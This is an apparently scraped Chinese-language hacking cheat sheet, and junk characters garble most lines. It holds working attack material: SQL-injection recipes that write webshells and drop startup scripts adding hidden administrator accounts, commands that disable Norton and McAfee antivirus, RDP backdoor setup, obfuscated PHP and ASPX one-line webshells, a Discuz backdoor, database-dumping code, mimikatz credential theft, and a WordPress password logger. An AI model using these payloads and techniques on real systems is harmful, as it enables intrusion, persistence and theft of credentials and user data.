2 @' j' S) p& ]4 J0 bSELECT password_hash FROM sys.sql_logins where name='sa'
" J; W: [, L4 bSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
$ l! x7 R* w9 L! e5 taccess中导出shell
6 q0 Q7 C, t9 C6 l2 c4 X& R- l  E' V! ^6 Z. b
中文版本操作系统中针对mysql添加用户完整代码:/ J3 t+ e$ O7 _+ A

% w1 \& Z2 D1 G% P0 Puse test;# [& X" e3 U' |4 V  J1 Z/ \) f# r9 _
create table a (cmd text);+ x( O7 E2 c. {0 }+ M
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
% a9 C# p9 V* e6 B: {insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );5 d+ i0 [# \% ?: w) B* c
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
7 ]3 p, r# N4 nselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
& r4 I, g( E( o& Zdrop table a;
( O2 |* c3 s% P' o% ^. h1 K( o8 w4 c2 Z
英文版本:
1 b" e% P( \7 G6 Z! s2 b+ Y/ G4 d$ t& j: r8 a5 G$ z; B4 O
use test;2 K) B/ T. r; E2 D" c) P
create table a (cmd text);
0 d8 M9 a+ @/ b* ]insert into a values ("set wshshell=createobject (""wscript.shell"") " );$ b( S. n8 ~% s7 y9 _. `
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
) V' R3 D6 L; w6 k& B  {3 D' e0 F7 Linsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
/ d* F6 ?8 i" }" l6 N) e: H( pselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
, n1 ~* S8 v  b4 B  U- {drop table a;3 D) P/ |8 q: j' z. @5 S* O
. B6 n* e0 T' M, B1 M
create table a (cmd BLOB);
3 v) o; r+ U/ F7 Z* Sinsert into a values (CONVERT(木马的16进制代码,CHAR));
- t$ R2 A$ J( e4 x2 }select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
' i8 |1 y" O* `5 Q  j+ z) Z$ ^drop table a;
) \2 \. q7 u6 u) I5 [, p3 N$ c* \& p
. K6 w* D& M7 Q2 `记录一下怎么处理变态诺顿
2 k* Y0 O4 k" r1 f% f查看诺顿服务的路径! Z: M9 _& ^. A" `7 V$ g2 i
sc qc ccSetMgr
  s0 P$ H, q# n7 a2 u6 \然后设置权限拒绝访问。做绝一点。。
! H: s, b3 p' v# a* H. |4 J) Xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
) o( W3 }1 _, ?$ E8 u# \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
7 r/ J9 W* {6 I) Z$ n8 T! Qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
! R" ]6 T8 C' J4 V/ B5 Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
3 S/ G0 e3 P- x" o3 S/ U: O& V$ F; i+ X- A; `2 e
然后再重启服务器* Y0 P* G- `( e$ |
iisreset /reboot
, U( f8 w( `' m; @; R; H这样就搞定了。。不过完事后。记得恢复权限。。。。
6 G. ~: ?  K+ G% l" y% Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
4 y3 m/ V. X8 d0 S$ \# V# P  E2 {cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F! o4 Z& h% g7 h' n. `7 ~
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
" @7 D/ y1 `& g$ |* y& vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F! j8 h( p1 P4 {# d
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin% h7 {! K- W6 G# N& o

1 p$ w& d1 T9 j. @* Y1 m" @$ |EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')9 i% a2 G# E) [- k

" D- |* I- U3 P0 j8 L9 R9 @% `8 Apostgresql注射的一些东西& Y, |8 A$ B& B& c* j  X
如何获得webshell
# q0 @  @+ g4 m# o, }http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ( D& ?7 O: K8 R9 j% b+ U
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ) m2 ?- Z1 }7 U$ [' ]
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
: {& i- b, ~  `( L如何读文件
+ v# k. S& X+ o$ Q. ^0 hhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);5 U7 c* N* w6 F
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
1 |3 l1 Y5 ]% P, f4 khttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
% g7 q6 k' d  V1 S, b$ V+ w; V* k
/ i: B' O# _* T* C" \# wz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
- a4 J! o& \' H* u- y当然,这些的postgresql的数据库版本必须大于8.X
5 \; g/ b, j6 \1 Q创建一个system的函数:
: B# m" V* n: Z- q; t- _# P' ECREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT4 |$ ?( P6 r$ l$ b2 P$ K' w+ {" N

1 K# P( M4 Y$ E  c创建一个输出表:2 N# A% f# q$ u# h. s& j
CREATE TABLE stdout(id serial, system_out text)+ k- ]9 n( z2 h$ h8 Y$ V
3 a7 X+ Z, i- x  U. a# q' l7 C
执行shell,输出到输出表内:
# o) X1 l) }  FSELECT system('uname -a > /tmp/test')
) q5 c8 q3 h$ w( V: ?2 S8 U( M% _6 X
copy 输出的内容到表里面;
( |. k9 V  i" d6 ^  `COPY stdout(system_out) FROM '/tmp/test'# `/ H! U/ |( U0 {2 ^
' ]# e$ w5 {0 q9 K
从输出表内读取执行后的回显,判断是否执行成功4 o8 v' F9 H  O) _, S# N3 w

7 _6 V- o# E! {0 M" gSELECT system_out FROM stdout, |/ z% p7 {2 k$ p5 W5 f; w! f
下面是测试例子. w. O- u. y. R& ^: H% e
" x+ s5 p; X3 R; W
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --   t6 b2 H) n- ~, t9 n
2 Q3 Q) ~4 v( T5 ^
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
( R- T! k1 H% s4 tSTRICT --: D! n# n! l$ S3 o6 [: c
. ^! d+ O. [5 J; H( b( W: [
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
5 G3 t/ X+ T# y6 U- a
# X5 b9 f4 T- c+ V/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --) P6 f4 T8 k5 f- M0 W
9 d0 x, `  ~! [% y
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
" H' M& K: K( i1 o% b: v( Onet stop sharedaccess    stop the default firewall
; Q! @) r% k% R7 onetsh firewall show      show/config default firewall
  i& {3 U  ^2 e6 b5 b+ Knetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall9 k6 O% E+ a3 {/ m1 t8 j
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall& i. T2 b6 ]( {4 \. v
修改3389端口方法(修改后不易被扫出)3 z& d2 m! ]6 J
修改服务器端的端口设置,注册表有2个地方需要修改2 G% d& f8 @8 l8 M. K  h9 F

' X! i7 o7 w2 T% v1 ^1 _# R; [[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
# P7 ]5 z! c5 k1 h4 q; |PortNumber值,默认是3389,修改成所希望的端口,比如6000: x3 \& h, i1 B* d! ^+ M
: n. b( Q# {: |$ ?6 F5 |
第二个地方:
  a5 L% ~. f' v& e9 E0 V[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
* K$ N5 H. t( A  P( F3 RPortNumber值,默认是3389,修改成所希望的端口,比如6000
2 S' ?* f3 _  H3 X/ ]. }8 S: h. Z0 _" d" R4 D
现在这样就可以了。重启系统就可以了
# T# |, h( w1 Y1 h' k
2 x1 P* t6 I2 q0 h+ e+ W+ o查看3389远程登录的脚本7 w8 y7 G: O$ w) S; w
保存为一个bat文件) Z) R% q- _1 k: E
date /t >>D:\sec\TSlog\ts.log
3 J+ `" V" M! @+ A7 ktime /t >>D:\sec\TSlog\ts.log
$ Z2 Z! A6 A& Znetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log. d! S. F* o4 Z- C
start Explorer3 d7 h/ D) Y7 t9 M. f5 G
. ^8 J  E; C1 q# b) r- b& Y6 W
mstsc的参数:
. a  P" B8 @! P$ w
& F* D. g  o; O, `- b  W4 _3 H远程桌面连接$ t' c! h4 H  A5 a1 M

7 W9 v" p2 z& OMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]], S, H8 m6 \& f1 `. g2 T
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?( w7 B0 @9 ?+ I, s

, d+ A) Q# h: K6 @1 K% }<Connection File> -- 指定连接的 .rdp 文件的名称。
" {# g4 b, M* w
& T, X* D+ u6 z- i& I/v:<server[:port]> -- 指定要连接到的终端服务器。
0 g" @# x6 g$ }9 f/ [
* e/ _$ R3 U- l/ B1 M& j/console -- 连接到服务器的控制台会话。6 j% x4 @8 w1 S1 h1 r7 }
* |. E, H2 [7 p9 q: t! z7 P
/f -- 以全屏模式启动客户端。6 I8 m# w; f$ `( u+ \4 c8 K0 B5 N

* J( y7 u  B3 u+ M/ ]" Z8 J: ^/w:<width> --  指定远程桌面屏幕的宽度。: G' G1 t0 H  d# a# ?9 t' [* S

% I( P+ k+ t$ r/h:<height> -- 指定远程桌面屏幕的高度。
% U* ^5 `( Q$ M* t* f  j* C0 }% j, [! K' S
/edit -- 打开指定的 .rdp 文件来编辑。7 I% H& G* Q& W

- h) Z; q* e2 T: u) m/migrate -- 将客户端连接管理器创建的旧版
3 E. w( u- k8 G连接文件迁移到新的 .rdp 连接文件。
6 y: J9 H7 _* D9 P2 h5 x- E2 t. p/ m3 b7 y3 _, D, ]8 L' t

: E4 W/ P! s' \" [$ o% g: c* e其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就0 y! x- P: Z* \, Y2 D; \3 s
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量8 {" ^. d9 l- a: t5 |4 Y- a
! F+ `" ]9 H, R1 ~. {
命令行下开启3389
  Z8 f: Z# Y% `' ?net user asp.net aspnet /add8 f" o, d/ |- O2 [# z: T5 e  v
net localgroup Administrators asp.net /add
; M9 J- O' B9 Ynet localgroup "Remote Desktop Users" asp.net /add/ \4 @7 }2 C, G0 ~# O: d
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
4 p$ Q( U. J  B9 ^4 ?5 a3 u% gecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0/ E' E0 j) }8 E! y  A  c
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 19 C3 R7 z0 E  S  q8 X2 N* w+ x- {
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f& t0 [% T; @2 p" Y% S! L
sc config rasman start= auto
8 l- @; h5 ~4 m- {! m) E2 t# ysc config remoteaccess start= auto
& q  ?& d0 E4 }4 a& Unet start rasman
3 L$ B6 [, Y7 o) E% i5 Lnet start remoteaccess2 n7 |5 @3 u+ l& V7 N
Media
# w! B& s) X$ ]2 }4 J<form id="frmUpload" enctype="multipart/form-data"9 y, @; L, t6 i9 m
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>& |- {" f# |/ L& Q
<input type="file" name="NewFile" size="50"><br>
  s7 y: ^. T3 z+ v, |4 k; t<input id="btnUpload" type="submit" value="Upload">
1 v4 P& _7 P& L8 Z# b% R</form>
6 |" m6 v  h* X2 a" Q8 j. Q3 p& h6 w' v8 l: T- W8 f( ~
control userpasswords2 查看用户的密码
0 J& t; a0 Z0 _- K+ caccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径( ]3 |' j4 ?7 x6 l3 d) u
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
, ]- I: A, Y5 x! \7 r( |2 z/ h+ V4 `. H4 N! Z/ ^0 C4 ^/ g
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
) C9 A5 N9 m$ P% q3 y' B2 M5 f) s测试1:
$ T8 j9 Q& u; L" SSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
4 {2 x) `0 z; O! r8 U( w
7 [% U* e; c+ x测试2:
' ]2 R. ^! D/ ]" B. C
  _$ i; w5 `9 x' ocreate table dirs(paths varchar(100),paths1 varchar(100), id int)
* o+ i5 v/ a+ H# H9 _  l% o' I) s: z4 g2 q! {6 \
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
! u0 }0 H1 d3 D$ {. F. h! ~5 c
: D. K/ z. M: {5 q  U+ VSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
, c) z6 B1 o1 U5 W关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
" y4 r0 |8 i. J) B  x# K可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;0 |2 {2 s# y6 p
net stop mcafeeframework. J* e; u" x5 ]' I- y
net stop mcshield
9 I2 d* I# r& }- |9 S  ]) j3 V! tnet stop mcafeeengineservice; L: H  o' B' b, E  C7 B8 R2 z
net stop mctaskmanager5 S7 S  l' p  v: n+ B
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D# Y1 c% B! R6 R$ g

4 K6 E* Q+ C$ c4 N  VNCDump.zip (4.76 KB, 下载次数: 1) . w/ W0 C6 T9 f  E
密码在线破解http://tools88.com/safe/vnc.php
- e; a8 `  P" D2 i" wVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
* L9 R5 ^  }  o, Q! K6 G3 R7 t0 m+ v0 O6 h7 i7 G* Q
exec master..xp_cmdshell 'net user'
" R( g' W4 l" B# Dmssql执行命令。- I+ t% A4 T. v, b4 e8 \) u+ A
获取mssql的密码hash查询8 }: k! ]$ \8 `- X5 o1 |' Y7 f
select name,password from master.dbo.sysxlogins
* c; D+ b- k3 [$ S' c
. h1 W% e0 s9 N6 x) v; Cbackup log dbName with NO_LOG;
6 v- L# N- c- K# lbackup log dbName with TRUNCATE_ONLY;
* h  O1 m0 I, V# `8 P. ]DBCC SHRINKDATABASE(dbName);
( k6 T2 U7 W! c. k! Smssql数据库压缩0 Y! V! S* a) n

% J8 C6 W, [  z1 w1 u3 g" ZRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
, }6 Q" m- C$ g- s3 y将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。( I( ?5 a! X+ @% I. D# e8 Y4 ~

" ?0 ^* O: _; M, @backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
4 l! n% L8 ?- d$ t$ U9 N8 ^2 `备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak# C& O7 s; ?$ \/ F

5 Y) [9 P" M" b5 q. \3 G! o; X; yDiscuz!nt35渗透要点:' O, w) M" c" ~% M! r7 ~
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
, w1 |. @$ I- F) f$ K1 }3 y(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>% I5 N/ B; V. e. U3 T
(3)保存。
$ N$ V# B6 P) G(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
$ W0 f8 l* M) ?$ c$ id:\rar.exe a -r d:\1.rar d:\website\
% P: G8 m5 F( d递归压缩website0 H1 s( O: p; l2 O, F
注意rar.exe的路径' W) A% D! A/ U, P, y
! W  U6 S: G' G/ K+ [
<?php
+ m" P+ p5 l2 _. ~9 }
& m. J1 l2 ^* N) _. O, H/ b3 H$telok   = "0${@eval($_POST[xxoo])}";( o  E! Y+ Y1 g6 E5 c
; ^# K. y% d% I1 F6 x
$username   = "123456";6 V' z3 u. C8 p2 o

, m: P3 _+ O4 X. s- Z, q# u4 |$userpwd   = "123456";
- v% E+ [$ {9 F* H: g! C& v+ ^
, v* X  q4 X  ^; G$telhao   = "123456";
+ h* i( K: l+ }: Y( n
' U! ]! W: S; L/ b$telinfo   = "123456";
  r. ?7 W8 _# @* ^- X
0 M( [3 O+ ]" o; f1 Y?>
8 S# ?8 q$ A, E5 ]php一句话未过滤插入一句话木马
# }5 O/ a) Z/ K( C5 ^
  Z# h  ~- a# `, f: ]9 i; ?站库分离脱裤技巧
/ N, c+ }3 Z1 ~/ rexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
. X8 c- {. Q! p. oexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
' \" K; c: U* n* R- p条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。2 [5 U3 l1 D" F9 j( Y; {; P* f
这儿利用的是马儿的专家模式(自己写代码)。8 L: ~' B* |" z) F
ini_set('display_errors', 1);
- O1 M) L' O7 r# ^: aset_time_limit(0);% W) ^, c* `  G$ y$ N
error_reporting(E_ALL);
, }4 E% f6 n+ V, i/ d& N/ A1 R, G& D, c$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
" h7 c. u7 G& X+ Zmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());3 a7 X9 D+ O* M9 C2 y
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
1 p8 }- d0 \. \, U/ d' ]7 g$i = 0;
: b# F  Z. D7 \$tmp = '';
; m9 u  R  [& s0 _; u. C+ [( |while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
5 N) V5 z0 l9 M3 O$ B+ n) N    $i = $i+1;
+ ?) F1 J) V0 _2 {' s! p3 c    $tmp .=  implode("::", $row)."\n";
8 o4 d' Z( l/ G) |& W$ Q4 u    if(!($i%500)){//500条写入一个文件
0 r5 p8 W3 g2 ?' \% c+ e1 H8 M! }        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
% A) K2 ?7 Z* f/ L) A4 i        file_put_contents($filename,$tmp);
2 w. F% k& U' \- Q        $tmp = '';
. l1 e7 e- f6 C& C    }
/ l1 q3 t& Z, M}
: R: P* Z: i$ k" Lmysql_free_result($result);5 H+ x$ ?6 S: k  v1 A/ k

# @1 D# I/ w& d7 `+ R; `* K2 q" @/ U0 p: X: |, ^' H  {

  c  s+ ]9 f2 u( J& `//down完后delete$ b; O: K2 {6 v+ M' U

4 I# N- X% z' u  I* L2 d' n
/ Q. p, @/ `+ H/ vini_set('display_errors', 1);
3 |7 n1 ^, P! d0 E# N3 p3 i& P. Cerror_reporting(E_ALL);2 L9 k3 p) I, i  `* @; d& q
$i = 0;7 d" g/ S5 ^$ @1 y4 @6 g
while($i<32) {; a2 o: h$ p( ]# O! W2 t
    $i = $i+1;
% E$ v& L4 L1 V5 P        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
  d) e) |4 V# d8 n/ J        unlink($filename);$ ~8 [9 z- m+ `/ v
}
3 y- C" T0 A$ L2 f" p0 @1 Zhttprint 收集操作系统指纹  f( ]$ N" A) _+ [! ]2 B
扫描192.168.1.100的所有端口
- x# n+ I$ S0 x/ C) Snmap –PN –sT –sV –p0-65535 192.168.1.100, w; O) O( \) s- }1 h
host -t ns www.owasp.org 识别的名称服务器,获取dns信息% a+ S8 F, m4 u& Z' `4 n5 P7 b2 e
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
; Y& _4 H# P5 vNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
: _3 {8 L) A* j& f
! R( Q3 z: ^9 SDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)$ I% m( K" T# J2 F0 A$ I: H9 _$ [

. }/ c; r& r$ m5 r* Z: r# h  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
8 O  o) h4 i$ \1 v1 |/ L3 o/ `& A% Z2 K- e8 I7 `$ i+ u) v
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
3 n2 }& f! }) z4 E: V: Q( R- G  [
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用), w* ^! K" w3 U9 J0 t6 B6 n
% P$ U1 n3 f( o! ?1 W% _
  http://net-square.com/msnpawn/index.shtml (要求安装)
8 {& }, \- v. @( `5 _. s' a1 B* ?* Y  C3 E
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
& B# X/ F" p  Q7 P6 r" c
8 e- ~, \5 x% l0 I* M7 T  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
0 Z8 w/ s" K/ d0 Q  hset names gb2312
8 T4 O: D. V* X  ?9 q* K" e# r7 A& ?导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
0 z) T- _. P" ]5 W# B3 R
8 f# d/ L, h. Y5 n6 v' D' B3 g. Ymysql 密码修改
- c( C4 X$ f5 T( p1 M! PUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” 3 d& O, y- Q7 K4 L) K, p
update user set password=PASSWORD('antian365.com') where user='root';
1 v' z; c( j' g$ l1 _' ~flush privileges;9 p$ z6 m: @9 J, w  j( I
高级的PHP一句话木马后门
" r* S0 ^$ D7 `0 p4 T
  [3 E  K1 `6 O1 [# I( _入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
$ W* y+ v& F8 S+ a2 ^, g( j) I. e2 B: [- S/ ^
1、
4 D3 k, X' |1 Z
, W, V8 r% A: K( [  h1 G1 {. R! {: }) c$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  \- h4 [0 q, R/ O+ D

1 z6 O1 |1 {  l; x. I$hh("/[discuz]/e",$_POST['h'],"Access");
2 z3 u3 H8 M8 ]/ v% X$ K& ]  X. @; f$ [' [" P5 L
//菜刀一句话, m" _! F. |2 d6 S" J

; u: `4 ]9 R1 N: R" D2、
, T( l5 H( g2 }0 f" y" v! U
& j) M4 y9 @; g5 k: N$filename=$_GET['xbid'];
6 ?! K1 W+ K% y( Z4 Q: P9 i& Q. }# M
include ($filename);
2 U& Y: @9 Y6 T3 }3 T
4 G$ P! r; e) r8 ?//危险的include函数,直接编译任何文件为php格式运行4 k5 r" q2 B+ v8 {7 r

6 F0 O$ f0 P, {2 V& j! [: ~3、8 s% H+ V6 a9 i) m9 Q6 x( A! [; i

5 ^5 w# i3 O/ N$reg="c"."o"."p"."y";0 }  s9 \- d& e) n- @
3 {8 [/ Y# A* f/ ~" t
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);) }- z; j; f% Y

  l6 L9 [+ r( @/ a# E) E6 T//重命名任何文件
9 i+ c0 A5 S, E7 s% p- r8 b8 [1 @+ `# ?
4、8 A/ S2 j% k4 T9 [1 D
9 z' ?! [3 f, a! z( B% x$ i! y
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";9 Y1 p! _- t- L, ~* W: H
9 w8 {. _9 T/ t9 @6 K$ J7 Z
$gzid("/[discuz]/e",$_POST['h'],"Access");
3 y% @0 y  U5 k/ |
0 c- `" p$ Z8 R# D$ D/ C//菜刀一句话
  s+ D& X5 u$ M$ V' c" A. y0 ^# h, O, t* e+ N' S2 C) e
5、include ($uid);; r1 C4 V0 N( r7 Z4 g) ?

% }8 Z: I+ c7 j/ |# B" I5 c. }//危险的include函数,直接编译任何文件为php格式运行,POST
8 E; J# f% D4 e4 {
$ X/ J3 Z) K1 M0 v& s( V/ F( w0 C  o# M  p
//gif插一句话
, z# m; j% u4 _! r
5 b* P+ o2 o0 a6、典型一句话
, \/ ~. d1 N; W6 K" ]8 M) o2 [  J8 C8 c: m1 Z  l+ h" t
程序后门代码+ s0 L/ r: Q9 m% O
<?php eval_r($_POST[sb])?>. D& T' M' Q2 `& B
程序代码
# y# C8 d% k$ n4 [3 R/ o<?php @eval_r($_POST[sb])?>
& R) T+ I$ B/ j! j/ P( J//容错代码
+ m1 R1 b! o/ Q1 V程序代码
- n1 U4 ?! l. O: i<?php assert($_POST[sb]);?>, x8 [! L) a' [5 Y
//使用lanker一句话客户端的专家模式执行相关的php语句3 ^- {, t# f$ R! X) {
程序代码5 I: i+ d5 m# B7 g* f
<?$_POST['sa']($_POST['sb']);?>
, b1 y# w' L# N( Q$ e; @+ u$ _程序代码
! W7 t. K& G! R# T- m( }9 o<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>$ R, U) {2 c* v1 v# L/ ^5 B- d
程序代码
8 c7 ?/ N$ z9 H+ F<?php
6 P! H) I& Q& w@preg_replace("/[email]/e",$_POST['h'],"error");" N$ t7 A/ \5 C0 s% z$ e" Y
?>
6 y$ f& A- G8 R. H; @7 U//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
) l% [/ d  f7 O$ ~, _程序代码
0 Z9 X, |; v3 Z3 o/ q. M<O>h=@eval_r($_POST[c]);</O>  g' R+ ?9 X0 i! X4 w- s! a
程序代码* Z3 T0 @% ?9 L2 O5 @
<script language="php">@eval_r($_POST[sb])</script>
) }& @  C7 t- s- L4 y//绕过<?限制的一句话
" `+ B% \4 p" p6 {  N
8 s1 i8 b! e7 s# q; _http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
3 j) @* s# X- a$ U) C2 p! y详细用法:' l- }4 G6 W6 S5 Y. |( [  G
1、到tools目录。psexec \\127.0.0.1 cmd
  V9 n& C# I( u2、执行mimikatz' r( I5 x. @0 m4 z8 t
3、执行 privilege::debug9 \  Y& ]. {% q8 u" o% u# ~8 R
4、执行 inject::process lsass.exe sekurlsa.dll: G8 C- K7 {6 t2 c
5、执行@getLogonPasswords
. c$ C* S9 {3 C' H6 j2 n- L# R6、widget就是密码1 Q' v, W( v: B" I0 ]
7、exit退出,不要直接关闭否则系统会崩溃。: h  v- b; z* ^  c; E4 E" ~
+ N7 x. _! F2 k% {8 Q; o" c+ x
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面* Y' [; N9 h1 c2 R1 p
0 P1 G$ t* d5 \& B
自动查找系统高危补丁. T/ v, _2 K0 ]* d4 h- n" R  R
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt  y# l5 T. N% ~$ }9 ~
& q8 u: s# D. h
突破安全狗的一句话aspx后门
7 q: r1 v! G4 D2 k2 ^6 f<%@ Page Language="C#" ValidateRequest="false" %>
4 Y4 T7 s4 D: S" P3 x6 P<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
7 d4 u  s/ B. a1 [- j% [9 ~+ n2 Awebshell下记录WordPress登陆密码& I& o* k. j: z9 n- q/ ~4 k
webshell下记录Wordpress登陆密码方便进一步社工- {9 }; {! q0 d
在文件wp-login.php中539行处添加:% V9 z1 t5 Y( b
// log password
, E6 a: D( n. ^" U& c$log_user=$_POST['log'];3 ?: I( i1 z1 x; _! r2 v
$log_pwd=$_POST['pwd'];' D" _  }; O5 S' r/ `) P8 H. L+ \' S& ~
$log_ip=$_SERVER["REMOTE_ADDR"];' C& v  r( O/ ?! u& ]
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;  W  I& C$ P/ {* Z( C6 l1 V) G
$txt=$txt.”\r\n”;3 Q1 L2 ~! y: W$ w0 N+ Q
if($log_user&&$log_pwd&&$log_ip){+ l! _- c: }" ^: E' ~
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);( n; G2 X, ]0 @+ ^2 S; `6 x, v
}
